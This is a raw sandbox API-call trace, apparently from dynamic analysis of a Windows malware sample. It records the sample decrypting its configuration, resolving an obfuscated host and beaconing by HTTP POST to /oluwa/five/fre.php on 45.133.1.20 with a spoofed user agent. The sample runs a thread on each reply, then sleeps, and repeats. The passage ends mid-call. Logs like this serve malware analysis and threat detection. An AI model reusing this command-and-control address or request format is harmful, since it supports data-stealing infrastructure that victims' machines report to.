returned 1 [0258.873] GetProcessHeap () returned 0x6a0000 [0258.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.874] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.875] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.876] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.878] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.878] GetProcessHeap () returned 0x6a0000 [0258.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0258.878] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.878] GetProcessHeap () returned 0x6a0000 [0258.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0258.879] GetProcessHeap () returned 0x6a0000 [0258.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.879] GetProcessHeap () returned 0x6a0000 [0258.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0258.880] GetProcessHeap () returned 0x6a0000 [0258.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0258.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.881] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.890] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0258.900] GetProcessHeap () returned 0x6a0000 [0258.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0258.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.902] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0258.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.903] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.904] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.904] GetProcessHeap () returned 0x6a0000 [0258.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0258.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.907] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0258.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.908] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0258.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.909] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0258.909] GetProcessHeap () returned 0x6a0000 [0258.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.910] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0258.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.911] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0258.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.912] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0258.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.913] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0258.913] GetProcessHeap () returned 0x6a0000 [0258.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0258.913] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0258.913] GetProcessHeap () returned 0x6a0000 [0258.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0258.913] socket (af=2, type=1, protocol=6) returned 0x8c4 [0258.913] connect (s=0x8c4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0258.939] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0258.939] GetProcessHeap () returned 0x6a0000 [0258.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0258.939] GetProcessHeap () returned 0x6a0000 [0258.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0258.940] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.942] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.942] GetProcessHeap () returned 0x6a0000 [0258.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dca58 [0258.943] GetProcessHeap () returned 0x6a0000 [0258.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.943] GetProcessHeap () returned 0x6a0000 [0258.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0258.943] GetProcessHeap () returned 0x6a0000 [0258.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0258.944] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.948] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.948] GetProcessHeap () returned 0x6a0000 [0258.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0258.948] GetProcessHeap () returned 0x6a0000 [0258.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.949] send (s=0x8c4, buf=0x6bd460*, len=242, flags=0) returned 242 [0258.950] send (s=0x8c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0258.950] GetProcessHeap () returned 0x6a0000 [0258.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0258.950] recv (in: s=0x8c4, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0259.057] GetProcessHeap () returned 0x6a0000 [0259.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0259.058] GetProcessHeap () returned 0x6a0000 [0259.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0259.059] GetProcessHeap () returned 0x6a0000 [0259.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dca58 | out: hHeap=0x6a0000) returned 1 [0259.060] GetProcessHeap () returned 0x6a0000 [0259.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0259.060] closesocket (s=0x8c4) returned 0 [0259.061] GetProcessHeap () returned 0x6a0000 [0259.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0259.061] GetProcessHeap () returned 0x6a0000 [0259.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.061] GetProcessHeap () returned 0x6a0000 [0259.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0259.063] GetProcessHeap () returned 0x6a0000 [0259.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0259.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15f8) returned 0x8c4 [0259.066] Sleep (dwMilliseconds=0xea60) [0259.067] GetProcessHeap () returned 0x6a0000 [0259.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0259.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.077] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0259.088] GetProcessHeap () returned 0x6a0000 [0259.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0259.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.090] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0259.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.091] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.092] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.092] GetProcessHeap () returned 0x6a0000 [0259.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0259.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.098] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0259.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.099] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0259.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.107] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0259.107] GetProcessHeap () returned 0x6a0000 [0259.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.109] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.110] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.111] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.112] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.112] GetProcessHeap () returned 0x6a0000 [0259.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0259.112] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.112] GetProcessHeap () returned 0x6a0000 [0259.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0259.113] GetProcessHeap () returned 0x6a0000 [0259.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.114] GetProcessHeap () returned 0x6a0000 [0259.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0259.114] GetProcessHeap () returned 0x6a0000 [0259.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0259.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.115] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.121] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0259.129] GetProcessHeap () returned 0x6a0000 [0259.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0259.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.130] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0259.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.133] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.134] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.134] GetProcessHeap () returned 0x6a0000 [0259.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0259.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.135] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0259.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.137] CryptDestroyKey (hKey=0x6ad020) returned 1 [0259.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.138] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0259.138] GetProcessHeap () returned 0x6a0000 [0259.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.141] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0259.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.142] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0259.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.143] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0259.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.177] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0259.177] GetProcessHeap () returned 0x6a0000 [0259.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0259.177] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0259.177] GetProcessHeap () returned 0x6a0000 [0259.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0259.177] socket (af=2, type=1, protocol=6) returned 0x8c8 [0259.178] connect (s=0x8c8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0259.200] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0259.200] GetProcessHeap () returned 0x6a0000 [0259.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0259.200] GetProcessHeap () returned 0x6a0000 [0259.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0259.201] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.202] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.202] GetProcessHeap () returned 0x6a0000 [0259.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dcb18 [0259.202] GetProcessHeap () returned 0x6a0000 [0259.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.203] GetProcessHeap () returned 0x6a0000 [0259.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0259.203] GetProcessHeap () returned 0x6a0000 [0259.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0259.203] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.204] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.205] GetProcessHeap () returned 0x6a0000 [0259.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0259.205] GetProcessHeap () returned 0x6a0000 [0259.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.205] send (s=0x8c8, buf=0x6bd460*, len=242, flags=0) returned 242 [0259.206] send (s=0x8c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0259.206] GetProcessHeap () returned 0x6a0000 [0259.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0259.206] recv (in: s=0x8c8, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0259.307] GetProcessHeap () returned 0x6a0000 [0259.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0259.308] GetProcessHeap () returned 0x6a0000 [0259.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0259.308] GetProcessHeap () returned 0x6a0000 [0259.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcb18 | out: hHeap=0x6a0000) returned 1 [0259.309] GetProcessHeap () returned 0x6a0000 [0259.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0259.309] closesocket (s=0x8c8) returned 0 [0259.310] GetProcessHeap () returned 0x6a0000 [0259.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0259.310] GetProcessHeap () returned 0x6a0000 [0259.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.311] GetProcessHeap () returned 0x6a0000 [0259.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0259.311] GetProcessHeap () returned 0x6a0000 [0259.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0259.312] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1608) returned 0x8c8 [0259.314] Sleep (dwMilliseconds=0xea60) [0259.319] GetProcessHeap () returned 0x6a0000 [0259.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0259.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.321] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.332] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0259.353] GetProcessHeap () returned 0x6a0000 [0259.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0259.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.354] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0259.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.357] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.358] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.358] GetProcessHeap () returned 0x6a0000 [0259.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0259.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.363] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0259.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.364] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0259.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.365] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0259.365] GetProcessHeap () returned 0x6a0000 [0259.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.366] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.367] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.369] StrStrA 